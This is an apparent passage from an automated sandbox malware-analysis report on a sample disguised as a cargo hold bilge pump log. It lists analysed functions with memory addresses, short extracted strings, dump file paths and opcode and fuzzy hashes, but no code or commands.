Uniqueness

Uniqueness Score: -1.00%

Function 0737AE38 Relevance: 2.8, Strings: 2, Instructions: 298COMMON

Download Yara Rule

Strings

PH^q, xrefs: 0737B023
PH^q, xrefs: 0737B0FB

Memory Dump Source

Source File: 00000000.00000002.2047554865.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 02dd361b95f3cc4a3301bc1f06e4a5be2d7600c3cb818e06ab5a7b269c6dd026
Instruction ID: 72f9536ad7c4e4a01826c0eac428877011ccab6a207c84e3d9980ac37e27452b
Opcode Fuzzy Hash: 02dd361b95f3cc4a3301bc1f06e4a5be2d7600c3cb818e06ab5a7b269c6dd026
Instruction Fuzzy Hash: F2D1B2B4A00209CFDB18DF69C598EA9B7F1BF4D701F2580A9E509AB371DB35AD41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0734BF88 Relevance: 2.7, Strings: 1, Instructions: 1460COMMON

Download Yara Rule

Strings

E0K4, xrefs: 0734D61E

Memory Dump Source

Source File: 00000000.00000002.2047521727.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7340000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: E0K4
API String ID: 0-2614948088
Opcode ID: ef32c35b8db03dfef70dd3948b59f9efee9fcb4d47e3be1ac327895ec852d9f1
Instruction ID: e9f13f094435427b906b94eef041eae7f302143e08f66df8f1b2d6e97f09148c
Opcode Fuzzy Hash: ef32c35b8db03dfef70dd3948b59f9efee9fcb4d47e3be1ac327895ec852d9f1
Instruction Fuzzy Hash: 09C26F70B20618CBD708BF79D8957ADBBB6BB88704F4084A9D48D97344DE38AD49CF52

Uniqueness

Uniqueness Score: -1.00%

Function 07374190 Relevance: .8, Instructions: 769COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047554865.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04d3efa3b5e61a56cf7600d223e9fd569bbf6bd36dfc82aeaf73dc38f7b83287
Instruction ID: 375292e02668fd31d39b40e4951185682880891fec431d72a1e99c03c62abdeb
Opcode Fuzzy Hash: 04d3efa3b5e61a56cf7600d223e9fd569bbf6bd36dfc82aeaf73dc38f7b83287
Instruction Fuzzy Hash: FF42DF71E042458FCB05EFB9D89455EBFF2BF8A304F1585AAD049DB251EF38A806CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0737415D Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047554865.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eeca46d78be32a1cc4e1700589951c9a1c8a45415c678185459791a17a8bda0
Instruction ID: 9517b795800b2c1751a8994c262338ed5328aecc759b94d1d02575252b0bd5c2
Opcode Fuzzy Hash: 0eeca46d78be32a1cc4e1700589951c9a1c8a45415c678185459791a17a8bda0
Instruction Fuzzy Hash: 35228D71F106158FCB08EFB9D88495EBBF2BF89704F158529D049AB354EF34A906CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0737B6C8 Relevance: .4, Instructions: 362COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2047554865.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a40c6812583573478a7ee823f0a434ae0d6ca1ff81c387f2082c0bb22f20302e
Instruction ID: a463f899a63a4c128a6f6ede091d893a3eb33f98180522104366eeb32b0136f4
Opcode Fuzzy Hash: a40c6812583573478a7ee823f0a434ae0d6ca1ff81c387f2082c0bb22f20302e
Instruction Fuzzy Hash: 90D1B9F07007158FEB29EB79C5507AEB7F6AF89204F14846DD149DB690CB39E901CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05C7C968 Relevance: .3, Instructions: 318COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6849ed380da2b1091ceb7cc7598094eb0b613f13e29ebe8321ca613c69bdead7
Instruction ID: 37f6c09ab6ddbc500c0dddd177f29cf6f8d95704dbfd8785cc32437f49e5302a
Opcode Fuzzy Hash: 6849ed380da2b1091ceb7cc7598094eb0b613f13e29ebe8321ca613c69bdead7
Instruction Fuzzy Hash: 44A19F70B002589FDB58BBBC851477F2AEBAFC8350F148578904AEB398DE389D438795

Uniqueness

Uniqueness Score: -1.00%

Function 04C27240 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2045787649.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce567f749b29c306c84e7d52e0e73c95c31c929e701c243e3ea44582b9cc753f
Instruction ID: d15601e6d8d508ad03ba8cdcebbbed836d0f8c054423c96c860ac65571fafab6
Opcode Fuzzy Hash: ce567f749b29c306c84e7d52e0e73c95c31c929e701c243e3ea44582b9cc753f
Instruction Fuzzy Hash: 5612A7B2C917658BD310CF65E86C1893BB1BB41328BD04A19D2611F6E5FBB4126EEF4C

Uniqueness

Uniqueness Score: -1.00%

Function 06DED30F Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046761193.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6de0000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 597f420176ef3fe223bce03ff384af746d3cb36d1e74502b3024ff5c7861924b
Instruction ID: a7e5fa49a2df536ecd72f4b21f93b9fd41a0d9b9cbaea936e45bbd1ace2bb1cd
Opcode Fuzzy Hash: 597f420176ef3fe223bce03ff384af746d3cb36d1e74502b3024ff5c7861924b
Instruction Fuzzy Hash: CFD11731D2075ACACB11EB64D990A9DF7B5FF95300F10C79AE1093B265EB706AC5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04C25034 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2045787649.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7a57c34eba88e5ceb86b5db108d70caa6b9a06cdc264c407366d264c008cf84
Instruction ID: fe0cc597c110abf4fbbe85f7b03a049312da97eb63191fb94c8b145ca21ab7ca
Opcode Fuzzy Hash: c7a57c34eba88e5ceb86b5db108d70caa6b9a06cdc264c407366d264c008cf84
Instruction Fuzzy Hash: EEA18C32E002299FCF05DFB4C9945AEB7B3FF84304B15456AE905AB224DBB1E915DB90

Uniqueness

Uniqueness Score: -1.00%

Function 06DED320 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2046761193.0000000006DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6de0000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc1ce49d0d3b62390c778e4768765a74c6b84e930714807bdafb8c8e2498e44f
Instruction ID: 62a8e1280b0e2e1b5617894e341d8a22c6225c206361fcc31e64489f594ca505
Opcode Fuzzy Hash: fc1ce49d0d3b62390c778e4768765a74c6b84e930714807bdafb8c8e2498e44f
Instruction Fuzzy Hash: BAD10631D2075ADACB11EB68D990A9DF3B5FF95300F10C79AE1093B265EB706AC5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04C27230 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2045787649.0000000004C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c20000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15a25b8c9611eb62661ec8fc8b5a4efb384cd48eed8a1fa1deec4f22f5e15730
Instruction ID: 639e7d682669c6216f51b73c1a6f0278adb4914e62ed26b3830c925346c63903
Opcode Fuzzy Hash: 15a25b8c9611eb62661ec8fc8b5a4efb384cd48eed8a1fa1deec4f22f5e15730
Instruction Fuzzy Hash: C7C12DB1C907668BD710CF65E8681897BB1BB85314FD04B19D1612F2E4FBB4226EEF48

Uniqueness

Uniqueness Score: -1.00%

Function 05C7FD68 Relevance: 6.4, Strings: 5, Instructions: 184COMMON

Download Yara Rule

Strings

@, xrefs: 05C7FE36
B, xrefs: 05C7FD8E
Hbq, xrefs: 05C7FE85
@, xrefs: 05C7FD89
B, xrefs: 05C7FE3B

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: @$@$B$B$Hbq
API String ID: 0-1093311442
Opcode ID: 346400135c87631230ba8a4886aa4ddec626de34c283864893aee8448038a909
Instruction ID: 33111c3641d062c56d638a973b79db584698c717599c658e921742779fe92137
Opcode Fuzzy Hash: 346400135c87631230ba8a4886aa4ddec626de34c283864893aee8448038a909
Instruction Fuzzy Hash: AD51C2357046098FC714DF79C88496ABBF6FF89310714896AE41ACB761DB31ED46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 025285D8 Relevance: 5.3, Strings: 4, Instructions: 273COMMON

Download Yara Rule

Strings

(o^q, xrefs: 02528616
(o^q, xrefs: 025286D1
(o^q, xrefs: 025286FD
(o^q, xrefs: 0252879A

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q
API String ID: 0-1978863864
Opcode ID: d2027440cc1ca7cc7d494c56e351fd9bd35819aa7347f0ec387f1eee98a70b27
Instruction ID: f1eefe2dd2638fcf118e96c9a6f7fc8cc2578c986cc49bc6deaa500b9cf52ca3
Opcode Fuzzy Hash: d2027440cc1ca7cc7d494c56e351fd9bd35819aa7347f0ec387f1eee98a70b27
Instruction Fuzzy Hash: B9C17C30A002199FCB14CFA9C988A9EBBF2FF49314F148559E419AB3E5D731ED49CB64

Uniqueness

Uniqueness Score: -1.00%

Function 05C7FD57 Relevance: 5.1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

Strings

@, xrefs: 05C7FE36
B, xrefs: 05C7FD8E
@, xrefs: 05C7FD89
B, xrefs: 05C7FE3B

Memory Dump Source

Source File: 00000000.00000002.2046523381.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c70000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: @$@$B$B
API String ID: 0-685577651
Opcode ID: 576d1151c8fe39742f17bdd102e9cbf55b9f7ab47fceadcf18843efc229feaee
Instruction ID: a2978c8d7aab6ea289b853efb7bc3b314e350e1eec1b6c04649210504da5d75f
Opcode Fuzzy Hash: 576d1151c8fe39742f17bdd102e9cbf55b9f7ab47fceadcf18843efc229feaee
Instruction Fuzzy Hash: E821A171B0461A8FDB24CF6DC9C89AEBBF5BF49210B14446AE006DB662D730DE45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02527808 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;^q, xrefs: 0252781E
\;^q, xrefs: 02527846
\;^q, xrefs: 02527814
\;^q, xrefs: 0252783A

Memory Dump Source

Source File: 00000000.00000002.2043971742.0000000002520000.00000040.00000800.00020000.00000000.sdmp, Offset: 02520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2520000_SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log.jbxd

Similarity

API ID:
String ID: \;^q$\;^q$\;^q$\;^q
API String ID: 0-3001612457
Opcode ID: 04d6bd6389efa2a8e905406938990d815149f1bb7650f15a890927d0a91c9d05
Instruction ID: a08fa9639cc88aa9592534d1e1a615566073497b23fb6bfc96665a7b659522e8
Opcode Fuzzy Hash: 04d6bd6389efa2a8e905406938990d815149f1bb7650f15a890927d0a91c9d05
Instruction Fuzzy Hash: 50019E31B001259F8B24CA2DC444A36BBEABF8EA7072544A9E406CF3F0DB31DC49C799

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: dll.exePID: 6048, Parent PID: 7984COMMON

Execution Graph

Execution Coverage:	17.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	1.1%
Total number of Nodes:	261
Total number of Limit Nodes:	30

Executed Functions

Function 01347898 Relevance: 9.7, Strings: 7, Instructions: 916COMMON

Download Yara Rule

Strings

(o^q, xrefs: 01348425
(o^q, xrefs: 01347DC2
(o^q, xrefs: 01348108
,bq, xrefs: 01348180
(o^q, xrefs: 013480FA
,bq, xrefs: 01348172
Hbq, xrefs: 01347C8E

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$,bq$,bq$Hbq
API String ID: 0-1608600535
Opcode ID: a737eda33dd3f8f1585c7fcb59a7b01ab0ff8ca93efeef7c85d2a827ef52eed2
Instruction ID: a9a7f107fe3b0ee69ea7fcc00dbd6d1a8252df9a57718d7fa4bbb791a5aaf07e
Opcode Fuzzy Hash: a737eda33dd3f8f1585c7fcb59a7b01ab0ff8ca93efeef7c85d2a827ef52eed2
Instruction Fuzzy Hash: 4D726074A002199FDB15DFA9C854AAEBBF6FF88308F148569E505EB361DB30ED42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 07911C4F Relevance: 5.6, Instructions: 5640
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000E.00000002.3572209513.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7910000_dll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bbfd9e072e1a601a03480ea19d701629b1cfc98c27635df0f79f3555edcb7cc
Instruction ID: 85e06a6ac4e19d1d933766b103a2efbfd74fee16419a626931bd93b347a1dc7e
Opcode Fuzzy Hash: 1bbfd9e072e1a601a03480ea19d701629b1cfc98c27635df0f79f3555edcb7cc
Instruction Fuzzy Hash: B3C31970A16219CFCB54EF78E99966DBBF2FB89200F0048E9D449A7350DB345E99CF42

Uniqueness

Uniqueness Score: -1.00%

Function 013452F8 Relevance: 2.8, Strings: 2, Instructions: 260COMMON

Download Yara Rule

Strings

Xbq, xrefs: 01345327
$^q, xrefs: 0134530E

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: 9722a829adfa1d96e29fae01aa9a04c1096361a59ec79e5cbadd713dbf4ac5b6
Instruction ID: c102f75270fe0bba4ddedfaed40165b4a4e8f6f622f22e69f74be54371ca86c6
Opcode Fuzzy Hash: 9722a829adfa1d96e29fae01aa9a04c1096361a59ec79e5cbadd713dbf4ac5b6
Instruction Fuzzy Hash: 1E819B74F00218DBDB1CAB79895467E7BB7BFC8750B458869E017E7288DE34DC428B92

Uniqueness

Uniqueness Score: -1.00%

Function 0134EE18 Relevance: 90.7, Strings: 72, Instructions: 688
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 0134F061
4'^q, xrefs: 0134F133
4'^q, xrefs: 0134F1BF
4'^q, xrefs: 0134F94E
4'^q, xrefs: 0134EF03
4'^q, xrefs: 0134F76A
4'^q, xrefs: 0134F205
4'^q, xrefs: 0134EE9A
4'^q, xrefs: 0134EFD5
4'^q, xrefs: 0134EFB2
4'^q, xrefs: 0134F922
4'^q, xrefs: 0134F34A
4'^q, xrefs: 0134EF8F
4'^q, xrefs: 0134F6BA
4'^q, xrefs: 0134EF6C
4'^q, xrefs: 0134F1E2
4'^q, xrefs: 0134F8CA
4'^q, xrefs: 0134F8F6
4'^q, xrefs: 0134F502
4'^q, xrefs: 0134EEBD
4'^q, xrefs: 0134F29A
4'^q, xrefs: 0134F179
4'^q, xrefs: 0134EE54
4'^q, xrefs: 0134EE31
4'^q, xrefs: 0134F24B
4'^q, xrefs: 0134F0CA
4'^q, xrefs: 0134F7EE
4'^q, xrefs: 0134F7C2
4'^q, xrefs: 0134F426
4'^q, xrefs: 0134F4D6
4'^q, xrefs: 0134F228
4'^q, xrefs: 0134F2C6
4'^q, xrefs: 0134F452
4'^q, xrefs: 0134F68E
4'^q, xrefs: 0134F47E
4'^q, xrefs: 0134F5B2
4'^q, xrefs: 0134F3CE
4'^q, xrefs: 0134F81A
4'^q, xrefs: 0134F89E
4'^q, xrefs: 0134F4AA
4'^q, xrefs: 0134F2F2
4'^q, xrefs: 0134F872
4'^q, xrefs: 0134F26E
4'^q, xrefs: 0134F31E
4'^q, xrefs: 0134F084
4'^q, xrefs: 0134EF49
4'^q, xrefs: 0134EFF8
4'^q, xrefs: 0134F55A
4'^q, xrefs: 0134F846
4'^q, xrefs: 0134F0A7
4'^q, xrefs: 0134F3A2
4'^q, xrefs: 0134F01B
4'^q, xrefs: 0134F60A
4'^q, xrefs: 0134F52E
4'^q, xrefs: 0134EF26
4'^q, xrefs: 0134EE77
4'^q, xrefs: 0134F376
4'^q, xrefs: 0134F5DE
4'^q, xrefs: 0134F110
4'^q, xrefs: 0134F712
4'^q, xrefs: 0134F662
4'^q, xrefs: 0134F156
4'^q, xrefs: 0134F586
4'^q, xrefs: 0134F73E
4'^q, xrefs: 0134F19C
4'^q, xrefs: 0134F6E6
4'^q, xrefs: 0134F796
4'^q, xrefs: 0134EEE0
4'^q, xrefs: 0134F03E
4'^q, xrefs: 0134F0ED
4'^q, xrefs: 0134F3FA
4'^q, xrefs: 0134F636

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-1605395142
Opcode ID: 6302f3a55b88f25c9e3fe06b6a75ad321467ebae694bf3cb9242a02526785235
Instruction ID: 589cc640d1d5e4e3c96452b3e0a896efb79107e3b0b1bd04db70bc3b62dd6f31
Opcode Fuzzy Hash: 6302f3a55b88f25c9e3fe06b6a75ad321467ebae694bf3cb9242a02526785235
Instruction Fuzzy Hash: CA720C30A1121A9FCF1CEF64E9546DDBBB1FB44704F1089A99049AB368DF306D8ADF91

Uniqueness

Uniqueness Score: -1.00%

Function 0134C2E1 Relevance: 8.9, Strings: 7, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,bq, xrefs: 0134C319
Te^q, xrefs: 0134C3A5
PH^q, xrefs: 0134C420
Te^q, xrefs: 0134C362
Te^q, xrefs: 0134C392
Te^q, xrefs: 0134C377
,bq, xrefs: 0134C2FE

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID: ,bq$,bq$PH^q$Te^q$Te^q$Te^q$Te^q
API String ID: 0-2528585569
Opcode ID: 0708aaaab156d66720ca8a4d552873be065cd976410117a3e8aeb2cbeb91c5be
Instruction ID: 4199ac8931343b5d441b65b7fc792973a13b00a46e0a72e241b7e9c6f3a76a85
Opcode Fuzzy Hash: 0708aaaab156d66720ca8a4d552873be065cd976410117a3e8aeb2cbeb91c5be
Instruction Fuzzy Hash: 1831F830B412089FD7189B79C858BAD7BF6BF84704F14942AE541AB395CE35AC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0134C348 Relevance: 8.8, Strings: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 0134C3B1
Te^q, xrefs: 0134C3A5
PH^q, xrefs: 0134C420
Te^q, xrefs: 0134C362
Te^q, xrefs: 0134C392
Te^q, xrefs: 0134C383
Te^q, xrefs: 0134C377

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID: PH^q$Te^q$Te^q$Te^q$Te^q$Te^q$Te^q
API String ID: 0-3527804896
Opcode ID: cade9d835b2ec5134464f18999343c3e3fe9cd03e316f5c02c6c26a91afa8df2
Instruction ID: bf6e5e53b7a577c4b2cdf20543cf218a45cde9f227866f7e3658e91a483b6a49
Opcode Fuzzy Hash: cade9d835b2ec5134464f18999343c3e3fe9cd03e316f5c02c6c26a91afa8df2
Instruction Fuzzy Hash: 5821F630F5021D9BCB185F7D8858BBEB9E6BB88B44F20491AE441BB388CE756C4987D1

Uniqueness

Uniqueness Score: -1.00%

Function 0134C295 Relevance: 7.6, Strings: 6, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 0134C3A5
PH^q, xrefs: 0134C420
Te^q, xrefs: 0134C392
Te^q, xrefs: 0134C362
Te^q, xrefs: 0134C383
Te^q, xrefs: 0134C377

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID: PH^q$Te^q$Te^q$Te^q$Te^q$Te^q
API String ID: 0-3339399616
Opcode ID: 0046ff5784f32600357f994f2c1fac4cdafeac83bf92b670435d13705946bc85
Instruction ID: 200a0f60ee04e1a75d8a38d05e9fc210e43b90f8a267ff8d25e543291be15164
Opcode Fuzzy Hash: 0046ff5784f32600357f994f2c1fac4cdafeac83bf92b670435d13705946bc85
Instruction Fuzzy Hash: 79314730B452489FCB1A9B7CD8586AD7FE5BF88718F14445AE440EB38ACB646C49C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0134ACA8 Relevance: 4.0, Strings: 3, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0134ADB8
$^q, xrefs: 0134ADC4
Hbq, xrefs: 0134AE64

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID: Hbq$$^q$$^q
API String ID: 0-1611274095
Opcode ID: a9474167449d95cc6a0c3422ad065af4e8d2b831f26ec79bd546e577d8b621c1
Instruction ID: 89d87a74c108c9b426cf90d23c8e3330bdb3d68b926de15293f5658e06963def
Opcode Fuzzy Hash: a9474167449d95cc6a0c3422ad065af4e8d2b831f26ec79bd546e577d8b621c1
Instruction Fuzzy Hash: 58510335BC01148FDB196F3A986863E3AEABFC5605368486AE557CB3A1DF34DC438790

Uniqueness

Uniqueness Score: -1.00%

Function 01346C70 Relevance: 2.8, Strings: 2, Instructions: 291COMMON

Download Yara Rule

Strings

Hbq, xrefs: 01346E51
Hbq, xrefs: 01346E84

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: f2e25555619f052ed585f5f7c5eff2200cbeb7db412b2f46f1efab39bae828ad
Instruction ID: f7408673c7b3a74c28da327bc23f98d05be18d95f20e1bcf08bda7ff9b83c588
Opcode Fuzzy Hash: f2e25555619f052ed585f5f7c5eff2200cbeb7db412b2f46f1efab39bae828ad
Instruction Fuzzy Hash: 45A1D174B402059FDB15AF69D859B6E7BE6FB89704F548829E506CB380CF30EC82CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01347370 Relevance: 2.7, Strings: 2, Instructions: 230COMMON

Download Yara Rule

Strings

,bq, xrefs: 01347450
,bq, xrefs: 01347446

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: 60b40fae45582b3782c21977b9d44807817f0d07e7dd14fee2fdb8cbc2ef6095
Instruction ID: 67c371249047396783a8f6ce8b4e2af717627c4e90c5cb767c6c6c781bb570cd
Opcode Fuzzy Hash: 60b40fae45582b3782c21977b9d44807817f0d07e7dd14fee2fdb8cbc2ef6095
Instruction Fuzzy Hash: D681AC34B00149CFDB14DF6DC8849AABBF6FF89218B1585A9D509EB761DB31F841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01345B30 Relevance: 2.7, Strings: 2, Instructions: 176COMMON

Download Yara Rule

Strings

XX^q, xrefs: 01345BD3
XX^q, xrefs: 01345BC7

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

API ID:
String ID: XX^q$XX^q
API String ID: 0-1102689228
Opcode ID: d03a0a2ba01ea29e07c7349d69010da93e7ad99e833e89d5a7aad447da43269b
Instruction ID: 88ec036769279c1dd35e93131efa8b88cd5ecdc8996b981cf51bd0f47560cee4
Opcode Fuzzy Hash: d03a0a2ba01ea29e07c7349d69010da93e7ad99e833e89d5a7aad447da43269b
Instruction Fuzzy Hash: 1151F630E042499FD7189B79C85872ABBE3FFC5704F24C86AE0559B3A5CB71AC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0134B368 Relevance: 2.6, Strings: 2, Instructions: 129COMMON

Download Yara Rule

Strings

Hbq, xrefs: 0134B482
Hbq, xrefs: 0134B44F

Memory Dump Source

Source File: 0000000E.00000002.3557639249.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1340000_dll.jbxd

Similarity

